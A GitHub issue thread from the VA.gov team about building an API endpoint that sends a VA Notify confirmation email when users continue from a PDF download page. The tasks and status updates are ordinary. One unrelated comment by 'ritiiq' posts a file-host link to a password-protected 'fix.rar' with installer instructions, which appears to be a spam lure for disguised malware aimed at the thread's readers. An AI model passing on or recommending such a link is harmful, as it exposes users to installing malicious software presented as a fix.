### ISSUE TITLE
Implement New API Endpoint to Trigger VA Notify Email on PDF Download Page

### ISSUE THREAD

**Issue by holdenhinkle** [department-of-veterans-affairs/va.gov-team#91460]
## Background
The goal of this work is to integrate VA Notify into our application to trigger an email notification when a user clicks the "Continue" button on the PDF download page. This enhancement will ensure that users receive a confirmation email with next steps, improving communication and user experience.  [**Outline ticket.**](https://app.zenhub.com/workspaces/accredited-representation-management-team-64d0dc51d3e8f4788ac6ef96/issues/gh/department-of-veterans-affairs/va.gov-team/90325)

## Tasks
- [x] **Create a new API endpoint**: Develop an endpoint that will be triggered when the "Continue" button is clicked on the PDF download page (#91412).
- [x] **Confirm template key formatting**: Validate whether template keys with spaces are allowed in VA Notify. Currently, only `first_name` uses an underscore, while other keys (e.g., `form name`, `form number`) use spaces. Confirm this in the #va-notify-public Slack channel if necessary. **According to the docs, spaces are allowed.**
- [x] **Integrate VA Notify**: Use the existing "Appoint a Representative v1 - Confirmation and Next Steps" template to send an email when the new endpoint is triggered. Utilize the default API key provided by VA Notify, as no specific API key is required.

## Acceptance Criteria
- [x] A new API endpoint is created that triggers the email when the "Continue" button is clicked on the PDF download page.
- [x] Template keys are confirmed to work with or without spaces and adjustments are made if necessary.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by opticbob** [comment]
Daily Update:
- Endpoint with tests are done
- Sending email code and tests are done
- Working through code secrets documentation

**Comment by opticbob** [comment]
The testing criteria for this ticket have been moved to [Test VA Notify email in staging and promote to production #92238](https://app.zenhub.com/workspaces/accredited-representation-management-team-64d0dc51d3e8f4788ac6ef96/issues/gh/department-of-veterans-affairs/va.gov-team/92238) so the code part of this ticket can be closed while we wait for the testing to happen.
